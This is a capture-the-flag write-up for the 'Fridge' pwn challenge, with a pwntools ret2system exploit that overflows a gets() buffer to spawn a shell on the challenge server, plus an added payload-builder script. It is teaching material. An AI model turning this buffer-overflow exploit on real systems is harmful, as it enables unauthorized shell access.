Fridge - PWN
Points: 100 | Flag: 0xfun{4_ch1ll1ng_d1sc0v3ry!p1x3l_b3at_r3v3l4t1ons_c0d3x_b1n4ry_s0rcery_unl3@sh3d!} | Solved by: Smothy @ 0xN1umb

what we got
32-bit ELF with a "smart fridge debugging service". binary imports both gets() and system() - classic combo: an unbounded read plus a shell primitive already linked in
```bash
$ checksec vuln
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
```
no canary, no PIE - we're eating good tonight. no canary means the saved return address is ours, no PIE means system@plt and every string in the binary sit at fixed addresses, and NX doesn't matter because ret2system never executes anything on the stack
the solve
first thing i see in strings:
- Fixed issue that allowed bad actors to get /bin/sh
lmaooo the author literally put /bin/sh in the binary and told us about it. found it at 0x0804a09a
vulnerable function is set_welcome_message - uses gets() to read into a buffer at ebp-0x2c (44 bytes). 44 bytes of buffer plus the 4-byte saved ebp puts the return address at offset 48.
exploit
```python
from pwn import *

r = remote('chall.0xfun.org', 32823)
r.recvuntil(b'> ')
r.sendline(b'2')  # menu option: set welcome message
r.recvuntil(b'chars):')

# ret2system baby
# 32-bit cdecl: after the hijacked ret pops system@plt, system() expects
# [esp] = return address and [esp+4] = its first argument
payload = b'A' * 48                 # 44-byte buffer + saved ebp
payload += p32(0x080490a0)          # system@plt
payload += p32(0xdeadbeef)          # fake ret (dont care, shell is already spawned)
payload += p32(0x0804a09a)          # "/bin/sh" left in the binary
r.sendline(payload)

r.sendline(b'cat /flag*')
print(r.recv())
```
ez 100 points
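the payload above is the whole trick, so here is the same layout written out as a small builder without pwntools. this is an added example, not the challenge author's code or part of the original solve; it assumes the addresses from the writeup (system@plt at 0x080490a0, "/bin/sh" at 0x0804a09a, buffer at ebp-0x2c) and includes the one check you actually want before sending anything through gets(): no 0x0a byte in the chain, because gets() stops at a newline (a NUL is fine, gets() copies it happily)

```python
import struct


def p32(value):
    """Pack a 32-bit little-endian value, same as pwntools' p32 on i386."""
    return struct.pack("<I", value)


def ret_offset(buf_disp_from_ebp):
    """Bytes from the start of a buffer at ebp-<disp> to the saved return
    address: the buffer itself, then the 4-byte saved ebp sitting at ebp."""
    return buf_disp_from_ebp + 4


def ret2func_payload(offset, func_addr, args, fake_ret=0xdeadbeef):
    """32-bit ret2func layout: padding | func | ret-after-func | arg0 | arg1 ...

    When the overwritten return address pops func_addr, the callee sees the
    stack exactly as if it had been CALLed from fake_ret with its cdecl
    arguments at esp+4, esp+8, ... so arg0 goes right after fake_ret.
    """
    payload = b"A" * offset + p32(func_addr) + p32(fake_ret)
    for arg in args:
        payload += p32(arg)
    return payload


def gets_safe(payload):
    """gets() reads until '\\n', so a 0x0a byte inside any address truncates
    the chain and the rest never lands on the stack. NUL bytes are not a
    problem for gets() (unlike strcpy), so only the newline is checked."""
    return b"\n" not in payload


def fridge_payload():
    """The writeup's payload, rebuilt from the numbers in the analysis
    (addresses assumed from the writeup, not recovered here)."""
    system_plt = 0x080490A0
    binsh = 0x0804A09A
    payload = ret2func_payload(ret_offset(0x2C), system_plt, [binsh])
    if not gets_safe(payload):
        raise ValueError("payload contains 0x0a, gets() would cut it short")
    return payload


if __name__ == "__main__":
    print(fridge_payload().hex())
```

swap in a different system/plt or string address and gets_safe() tells you immediately whether the chain survives the read; an address like 0x08040a00 packs to `00 0a 04 08` and would silently stop the copy after the first 50 bytes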
flag
0xfun{4_ch1ll1ng_d1sc0v3ry!p1x3l_b3at_r3v3l4t1ons_c0d3x_b1n4ry_s0rcery_unl3@sh3d!}
smothy out ✌️